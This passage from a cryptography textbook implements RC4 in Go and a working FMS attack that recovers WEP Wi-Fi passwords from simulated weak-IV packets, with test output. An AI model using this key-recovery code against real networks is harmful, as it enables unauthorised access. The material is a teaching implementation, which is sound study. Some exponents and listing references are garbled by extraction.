and shaking it violently. The rocks would definitely be misplaced, their “ordering”
would change, but the box would still have the same number of rocks and the same
rocks as before.
Two pointers i and j that keep jumping around the S-box indices based on the algo-
rithm steps.
Our definition for the RC4 internal state is shown in listing 4.9. We also define a swap
helper function on line 13 that we will shortly be using in KSA and PRGA methods.
Listing 4.9 ch04/rc4/impl_rc4/impl_rc4.go
1 package impl_rc4
2
3 import (
4 ”math/rand”
5 ”time”
6 )
7
8 type RC4 struct {
9 key []byte
10 state [256]byte
11 }
12
13 func swap(x, y *byte) {
14 tmp := *x
15 *x = *y
16 *y = tmp
17 }
18
19 func NewRC4(key []byte) *RC4 {
20 rc4 := &RC4{
21 key: make([]byte, len(key)),
22 }
23 copy(rc4.key, key)
24 return rc4
25 }
RC4 consists of two phases: (1) the key-scheduling algorithm (KSA) and (2) the pseudo-
random generation algorithm (PRGA). When RC4 is initialized with a new key, KSA runs
once and then PRGA generates the bytes to be used as the keystream.
The pseudocode for KSA is shown in listing 4.10 [1]. The S array denotes the S-box
and K is the initial key. The first loop initializes the S-box with all values from 0 to 255
(inclusive). The second loop shuffles those bytes around by using the i and j pointers.
The i pointer scans the S-box all the way from starting index 0 to last index 255 in an
incremental fashion. The j pointer however keeps jumping all over the place. Each new
value of j is obtained by adding previous value of j, S[i] and K[i] (if i is greater than the
length of the key, the lookup simply becomes K[i%len(K)]). At each step S[i] and S[j]
are swapped in the S-box.
Listing 4.11 implements the pseudocode from listing 4.10 in Go. The first iteration of
KSA with a key of "HELLO" is shown in figure
Listing 4.11 ch04/rc4/impl_rc4/impl_rc4.go
Figure 4.9 First iteration of KSA for RC4 with a key of “HELLO”, this step happens 255 more times.
The pseudocode for PRGA is shown in listing 4.12 [1]. Every time we need a new
byte for the keystream we increment i by one (wrapping around 256 if needed), and then
add S[i] to j. We then swap S[i] and S[j] and use S[i]+S[j] as an index once more
into the S-box to fetch the final output, the keystream byte K. Listing 4.14 shows the
same pseudocode translated to Go. Figure 4.10 shows PRGA generating a single byte of
keystream by showing line 46 in action.
i := 0
j := 0
while GeneratingOutput:
i := (i + 1) mod 256
j := (j + S[i]) mod 256
swap values of S[i] and S[j]
KS := S[(S[i] + S[j]) mod 256]
output KS
endwhile
Figure 4.10 One iteration of PRGA producing a keystream byte (after i & j are already swapped)
4.3.2 Exploiting RC4 in WEP using the Fluhrer, Mantin and Shamir (FMS) attack
WEP (Wired Equivalent Privacy) is an algorithm for Wi-Fi security that was ratified as
a standard in the late 90s. If you’ve had the experience of setting a Wi-Fi password on
routers supporting WEP in the early 00s you might remember that they had to be of a
fixed length (among a few choices – 5, 13, 16 or 29 characters long). I remember being fond
of helloworld123 as the Wi-Fi password for a while because it was exactly 13 characters
long while being very easy to communicate & remember.
Figure 4.11 shows the commonly used setup for WEP. An administrator performed the
initial setup on the Wi-Fi device by entering a pre-shared key and then shared that with
the user. The pre-shared key was colloquially known as the “Wi-Fi password” (and every
so often the admin and the user happened to be the same unfortunate soul). Each packet
was encrypted using RC4 with a new key. Each RC4 key would be obtained by concatenat-
ing three random bytes – known as “initialization vector” or IV – with the pre-shared key.
The IV would be sent publicly along with the encrypted packet. The recipient would con-
catenate the packet’s IV again with the PSK to decrypt the packet correctly. If an attacker
snooped the wireless traffic they would know the IV but not the PSK hence they would (in
theory) not know the individual RC4 keys for each packet and the communication would
stay protected. Essentially, the IV is the cryptographic nonce we discussed briefly while
introducing stream ciphers.
Figure 4.11 WEP setup showing pre-shared keys and initialization vectors as input to RC4
As soon as WEP was standardized in the late 90s concerns were raised about the nonce
being too small. The IV consisted of only three bytes or 24 bits – providing 224 possi-
ble values. Even if the Wi-Fi drivers (that provided the initialization vector) were using
good quality RNGs it would on average take 212 (roughly four thousand) packets before
two messages ended up using the same IV; allowing an attacker to recover their XORed
contents.
In the early 2000s a new attack on RC4 – known as the FMS attack (based on the sur-
names of its discoverers) – came to light that completely shattered any illusions of security
provided by WEP. Even with the discovery of this new attack, all RC4 implementations
were not broken. For example, at the time TLS (Transport Layer Security, used to pro-
vide website security) remained unscathed because it was using a unique 128-bit key for
each message. Compared to WEP – where an attacker needed to capture 4 thousand pack-
ets before seeing a collision – an attack on TLS needed drastically more (264 or some
18 quintillion) messages before a collision would take place on the same web connection.
TLS’ usage of RC4 was later broken by other weaknesses in the cipher that would be too
discursive to discuss in this chapter. We will however implement the FMS attack in Go
and simulate WEP traffic to test our exploit.
GENERATING WEP PACKETS WITH WEAK IVS
At its core, the FMS attack hinges on the choice of initialization vectors used by Wi-Fi
devices. All WEP IVs are not equally vulnerable to this attack, instead, it only operates
when someone ends up choosing an IV of the form shown in equation 4.8.
63 var SNAPHeader = [8]byte{0xAA, 0xAA, 0x03, 0x00, 0x00, 0x00, 0x08, 0x06}
64
65 type WEPPacketGenerator struct {
66 psk []byte
67 }
68
69 func NewWEPPacketGenerator(psk []byte) *WEPPacketGenerator {
70 generator := &WEPPacketGenerator{
71 psk: make([]byte, len(psk)),
72 }
73 copy(generator.psk, psk)
74 return generator
75 }
76
77 func (wpg *WEPPacketGenerator) GeneratePacketUsingWeakIV(targetIndex int)
([3]byte, []byte) {
78 iv := [3]byte{byte(targetIndex), 255, byte(rand.Intn(256))} Weak IV (equation 4.8)
79 key := make([]byte, len(iv)+len(wpg.psk))
80 copy(key[0:len(iv)], iv[:])
81 copy(key[len(iv):], wpg.psk)
82 rc4 := NewRC4(key)
83 return iv, rc4.Encrypt(SNAPHeader[:])
84 }
To understand the FMS exploit we will look at the RC4 key and S-box in detail at each
step of the key-scheduling algorithm (for the first few steps). As the attacker we know the
first 3 bytes of the RC4 key (the IV) so the first time we call GeneratePacketUsingWeakIV
(targetIndex) we set targetIndex to 3. For a PSK of length N , after the concatenation of
the IV and PSK the RC4 key would look like figure 4.12. The S-box at the very beginning
of KSA looks like figure 4.13, corresponding to the values for i and j in equation 4.9.
Figure 4.12 RC4 key for GeneratePacketUsingWeakIV(targetIndex=3)
Figure 4.13 KSA S-box and key for RC4 in WEP (S0 , the initial state)
i0 = 0
(4.9)
j0 = 0
For your convenience we are listing the pseudocode for KSA again in listing 4.15. Fol-
lowing the pseudocode the first update to i and j is shown in equation 4.10. At the end of
each iteration of the KSA S [ jnew ] is swapped with S [iold ]. For example, at the end of the
first iteration S [i0 ] is swapped with S [ j1 ], giving us S1 depicted in figure 4.14. The values
at indices 0 & 3 (the shaded boxes) have just been swapped.
Let’s execute one more iteration of KSA, giving us equation 4.11 and figure 4.15.
i2 = 2
j2 = j1 + S1 [i1 ] + K [i1 ]
= 3 + S1 [1] + K [1]
(4.11)
= 3 + 1 + 255
= 259
≡ 3 (mod 256)
The first two bytes of the IV (3 and 255) have played their role in scrambling the S-box.
We chose a random value for the third box and called it X. The reason we did not actually
give X a value is because it does not really matter (for the discussion of this attack). Let’s
keep it as X and get new values of our counters in equation 4.12.
Figure 4.15 KSA for RC4 in WEP (S2 )
i3 = 3
j3 = j2 + S2 [i2 ] + K [i2 ]
= 3 + S2 [2] + K [2] (4.12)
=3+2+X
= X′
The reason we don’t care about X and X ′ is because X is already known as the third
byte of the IV (i.e., as K [2]) for each packet. We do not need to crack X, it will always
be sent in public by the Wi-Fi devices. We are interested in the first byte of the PSK, i.e.,
PSK1 or K [3] that we will obtain by the end of this procedure. For now, let’s swap the
values at indices 2 (i.e., i2 ) and X ′ (i.e., j3 ) in our S-box, as shown in figure 4.16.
i4 = 4
j4 = j3 + S3 [i3 ] + K [i3 ] (4.13)
= j3 + S3 [3] + K [3]
Let’s take a look at the next update of our counters in equation 4.13, giving us S4 as
shown in figure 4.17. We are getting closer to what we want, i.e., K [3]. We can try rear-
ranging our variables to get the holy grail (K [3]) in equation 4.14.
K [3] = j4 − j3 − S3 [i3 ]
(4.14)
= j4 − X ′ − S3 [3]
Now we face a challenge in continuing our KSA execution with the next byte of the key:
as attackers we have now exhausted the three public bytes from the IV, ending up with the
same S4 as the genuine recipient so far (shown in figure 4.17). We also know X ′ because
that depended on X, the public third byte of the IV. However, we still do not know j4 . In
other words, since the IV is public, as attackers we can only do the first three iterations of
KSA (for certain weak IVs) but continuing beyond that would require knowledge of the
PSK.
i := 0
j := 0
while GeneratingOutput:
i := (i + 1) mod 256
j := (j + S[i]) mod 256
swap values of S[i] and S[j]
KS := S[(S[i] + S[j]) mod 256]
output KS
endwhile
Now imagine that values at the three locations pointed to by arrows in figure 4.17 (in-
dices 0, 1 and 3) do not change for the rest of the KSA. That is, when we get to the
PRGA (shown again in listing 4.16 for convenience), we have (S0 [0], S0 [1], S0 [3]) =
(3, 0, j4(ksa) ) (i.e., they have remained unchanged from S4 of KSA all the way up to S255
which becomes S0 for PRGA). This is not as far-fetched as it sounds really; the i pointer
traverses the S-box all the way from left to right while the j pointer keeps hopping all over
the place. Since i has already traversed indices 0, 1, and 3 by S4 , our assumption relies on j
not landing over one of these crucial indices again for the rest of the KSA. If this condition
holds true, the initial S-box for PRGA is shown in figure 4.18. The first update for our
counters is shown in equation 4.15.
i0 = 0; j0 = 0
i1 = 1; j1 = j0 + S0 [1]
(4.15)
=0+0
=0
After the swap we get S1 as shown in figure 4.19. The first byte of the keystream (output
of the PRGA) is given by equation 4.16. If our grand assumption holds that the important
bytes did not change positions between S4 and S255 of KSA (and hence S0 of PRGA),
the first byte of the keystream will be j4(KSA) , exactly what we needed to solve for K [3]
in equation 4.14. Equation 4.17 shows the final calculation we will do to resolve K [3].
Remember, we could run KSA only up to j3 and could not find out j4 . However, because
of our assumption of crucial bytes not shifting for the rest of KSA we found out j4 as the
first output of the PRGA.
Figure 4.19 PRGA S-box for RC4 in WEP (S1 )
How often would our assumption (that the crucial positions were not touched between
S4(KSA) → S255(KSA) → S0(PRGA) ) hold? If RC4 in WEP was not vulnerable to the FMS
1
attack the answer would have been 256 , i.e., any of the bytes of S4(KSA) should have an
equal probability of about 0.4% of being the first output of PRGA. As it turns out, RC4
has statistical biases, where our assumption holds for about 3-5% of the time (much greater
than 0.4%). The practical implication of this bias is that since we know the first 8 bytes of
plaintext, we can always find out KS[0]; and j4(KSA) will simply be the most frequent value
that appears as KS[0]. To recap, without these biases KS[0] would give us no information
about the original key, but because of them KS[0] tends to be j4(KSA) with more frequency
than chance. This allows attacker to recover K[3] by using equation 4.17. The attack works
for any index other than 3 as well (granted we have recovered the key bytes before that
index) as shown by equation 4.18.
We can now implement our attack in Go and use the WEP Packet Generator from
listing ?? (that encrypts first 8 bytes of WEP packets – the fixed SNAP header – with a user-
provided PSK and a weak IV) to test our attack. Listing 4.17 shows the FMS algorithm
recovering the PSK for RC4 in WEP, the attack sequence is described below:
RecoverWEPPSK(wpg, partialKey) is called with a WEP Packet Generator initial-
ized with a specific PSK. Please note that RecoverWEPPSK cannot see the PSK, it can
only ask for more packets to be generated using weak IVs. This is simulating an at-
tacker sniffing Wi-Fi packets and encountering weak IVs. The amount of traffic we
simulate is capped by the WEPMessageVolume constant, set to 50k for our current test.
partialKey denotes partially recovered PSK; so for the first invocation of the method
it will be an empty slice, for the second it will contain one byte and so on.
The first thing we do inside the function body is to identify the index we want to target
with our FMS attack. Since the first three bytes of the RC4 key are known (as the IV),
the targetIndex value would be equal to the length of the PSK we have recovered
so far plus three. At the beginning, we do not know any bytes of the PSK so the
targetIndex is 3. This is shown in line 18. The targetIndex variable corresponds
to L in equation 4.18.
Lines 23 - 24 depict a known-plaintext attack where the knowledge of the first byte of
the plaintext is able to give us the first byte of the keystream. For the FMS attack, the
first keystream byte is actually all we need (we don’t need the next 7 keystream bytes
even though they can be found out by XORing ciphertext with the SNAP header).
Lines 26 - 28 copy the IV and partial PSK respectively to create the RC4 key.
Lines 30 - 38 depict partial execution of KSA up to iteration L.
Lines 40 - 45 show us finding a candidate for K [L] in equation 4.18. We will get
multiple values for K [L], but the correct value will appear 3-5% of the time (instead
of only 0.4% of the time – which would have prevented us from selecting one value
as the “winner”).
The remaining lines of the function simply select the byte value that appeared the
most as K [L]. We pretty print some stats end then function by returning the candi-
date byte that appeared with the highest frequency.
1 package exploit_rc4
2
3 import (
4 ”fmt”
5
6 ”github.com/krkhan/crypto-impl-exploit/ch04/rc4/impl_rc4”
7 )
8
9 const WEPMessageVolume = 50000
10
11 func swap(x, y *byte) {
12 tmp := *x
13 *x = *y
14 *y = tmp
15 }
16
17 func RecoverWEPPSK(wpg *impl_rc4.WEPPacketGenerator, partialKey []byte) byte
{
18 targetIndex := 3 + len(partialKey) RC4 key = 3 bytes of IV + PSK
19 totalCount := 0
20 freqDict := [256]int{}
21
22 for i := 0; i < WEPMessageVolume; i++ { Recover the first byte
23 iv, ciphertext := wpg.GeneratePacketUsingWeakIV(targetIndex) of keystream using
24 keystreamByte := impl_rc4.SNAPHeader[0] ^ ciphertext[0] known plaintext
25
26 key := make([]byte, len(iv)+len(partialKey)) Concatenate IV and PSK to
27 copy(key[0:len(iv)], iv[:]) create the RC4 key
28 copy(key[len(iv):], partialKey)
29
30 state := [256]byte{}
31 for i := 0; i < 256; i++ {
32 state[i] = byte(i)
33 } Partial execution of KSA
34 j := 0 for targetIndex iterations
35 for i := 0; i < targetIndex; i++ {
36 j = (j + int(state[i]) + int(key[i])) % 256
37 swap(&state[i], &state[j])
38 }
39
40 candidateKey := (int(keystreamByte) - j - int(state[targetIndex])) % 256
41 if candidateKey < 0 {
42 candidateKey += 256
43 } Calculate K[L] from equation 4.18
44 freqDict[candidateKey] += 1 and track the count for each
45 totalCount += 1 candidate
46 }
47
48 var highestFreqCandidate byte
49 var highestFreqPercentage float64
50 for i := 0; i < 256; i++ {
51 freqPercentage := float64(freqDict[i]) / float64(totalCount) * 100
52 if freqPercentage > highestFreqPercentage {
53 highestFreqCandidate = byte(i)
54 highestFreqPercentage = freqPercentage
55 }
56 }
57
58 fmt.Printf(”recovered byte: 0x%02x, frequency: %.2f%%\n”,
highestFreqCandidate, highestFreqPercentage)
59 return highestFreqCandidate
60 }
The output for our test is shown in listing 4.19. As you can see, the correct K [L] values
(that appeared as the most frequent candidate) also fall roughly in the 3-5% range. Con-
gratulations, not only have we implemented FMS attack to successfully recover a WEP
PSK!
$ make exploit_rc4
go clean -testcache
go test -v ./ch04/rc4/exploit_rc4
=== RUN TestRecoverWEPPSK
exploit_rc4_test.go:10: message volume: 50000
recovered byte: 0x68, frequency: 4.32%
recovered byte: 0x65, frequency: 5.28%
recovered byte: 0x6c, frequency: 4.75%
recovered byte: 0x6c, frequency: 2.76%
recovered byte: 0x6f, frequency: 3.40%
recovered byte: 0x77, frequency: 4.37%
recovered byte: 0x6f, frequency: 4.69%
recovered byte: 0x72, frequency: 5.86%
recovered byte: 0x6c, frequency: 3.25%
recovered byte: 0x64, frequency: 3.49%
recovered byte: 0x31, frequency: 5.31%
recovered byte: 0x32, frequency: 5.56%
recovered byte: 0x33, frequency: 4.61%
exploit_rc4_test.go:18: recovered key: ”helloworld123”
recovered byte: 0x31, frequency: 5.31%
recovered byte: 0x73, frequency: 5.85%
recovered byte: 0x75, frequency: 4.66%
recovered byte: 0x70, frequency: 5.36%
recovered byte: 0x65, frequency: 4.31%
recovered byte: 0x72, frequency: 6.94%
recovered byte: 0x73, frequency: 5.47%
recovered byte: 0x65, frequency: 4.84%
recovered byte: 0x63, frequency: 5.97%
recovered byte: 0x72, frequency: 4.84%
recovered byte: 0x65, frequency: 6.28%
recovered byte: 0x74, frequency: 3.84%
recovered byte: 0x31, frequency: 5.10%
exploit_rc4_test.go:34: recovered key: ”1supersecret1”
--- PASS: TestRecoverWEPPSK (4.03s)
PASS
ok github.com/krkhan/crypto-impl-exploit/ch04/rc4/exploit_rc4 4.031
s
We have also just implemented our first probabilistic/statistical attack – where the re-
sults are not guaranteed – which are encountered quite often in cryptography. The reader
is encouraged to change WEPMessageVolume in 4.17 to different values to see how that
impacts our results. With 50k messages (using weak IVs) we were able to recover the two
PSKs we tested. If we set the message volume to 500 we get incorrect results as shown in
4.20. The low volume corresponds to low-traffic Wi-Fi connections: it was easier to break
WEP in public places like cafés where there was high volume of traffic (and hence more
messages with weak IVs) than residential areas where it would take longer for weak IVs to
appear. In other words, the more Wi-Fi traffic an attacker was able to capture with weak
IVs the more confidence they could gain in the results of their FMS attack.
Listing 4.20 Low message volume leads to incorrect results for the FMS attack
$ make exploit_rc4
go clean -testcache
go test -v ./ch04/rc4/exploit_rc4
=== RUN TestRecoverWEPPSK
exploit_rc4_test.go:10: message volume: 500
recovered byte: 0x68, frequency: 3.80%
recovered byte: 0x65, frequency: 5.40%
recovered byte: 0x6c, frequency: 3.40%
recovered byte: 0x6c, frequency: 3.60%
recovered byte: 0x94, frequency: 2.00%
recovered byte: 0x2c, frequency: 2.60%
recovered byte: 0x95, frequency: 3.80%
recovered byte: 0x72, frequency: 4.40%
recovered byte: 0x6c, frequency: 3.20%
recovered byte: 0x64, frequency: 2.40%
recovered byte: 0x31, frequency: 6.40%
recovered byte: 0x32, frequency: 4.00%
recovered byte: 0x33, frequency: 5.80%
exploit_rc4_test.go:20: recovered key: ”hell\x94,\x95rld123”
exploit_rc4_test.go:24: key mismatch, recovered: [104 101 108 108 148 44
149 114 108 100 49 50 51], original: [104 101 108 108 111 119 111 114
108 100 49 50 51]
--- FAIL: TestRecoverWEPPSK (0.04s)
FAIL
FAIL github.com/krkhan/crypto-impl-exploit/ch04/rc4/exploit_rc4 0.038
s
FAIL
make: *** [Makefile:54: exploit_rc4] Error 1
4.4 Summary
XOR is a Boolean operation that takes two inputs and outputs true if and only if one
of them is true. In other words, XOR is true one of its inputs is exclusively true.
XOR serves as the building block of many encryption algorithms because:
– When using the same key, encryption and decryption are reverse operations of
each other and hence ciphertext can be reversed back to plaintext using the original
key.
– For a bit encrypted with XOR, without knowledge of the key, all plaintexts (both
true and false) have equal probability of being the original message.
XOR encryption runs the risk of known-plaintext attacks where an attacker can XOR
the corresponding ciphertext with a known-plaintext to recover the key.
An attacker can also XOR two ciphertexts to reveal XOR of their corresponding plain-
texts.
If we had a unique random key as long as the message for each message we wanted
to encrypt we could simply XOR them together to get ciphertext, and it would be
the perfect unbreakable encryption system. This construction is called the “one-time
pad” but is not widely used because securely communicating a key of the same length
as the message begs the question in a way, where now we have to solve the practical
concerns of how to transport the key.
Therefore, instead of using XOR directly, we seed an RNG with a short “key” or
seed and then use the output of the RNG as our “keystream” which we XOR with
the plaintext.
Linear-feedback shift registers (LFSRs) can be used as stream ciphers but on their
own their internal working details can easily be reversed by exploiting the linear na-
ture of their output (e.g., by using linear algebra).
RC4 is a widely used stream cipher that was used by the first Wi-Fi security stan-
dard (WEP) insecurely that allows an attacker to recover the Wi-Fi password just
by snooping on encrypted communications between genuine participants and then
using the statistical biases in RC4 to recover the original pre-shared key.
References
[1] Rc4. https://en.wikipedia.org/wiki/RC4. 16, 17
[2] Sub-network access protocol (snap). https://www.firewall.cx/
networking-topics/ethernet/ethernet-frame-formats/202-
ieee-8023-snap-frame.html. 20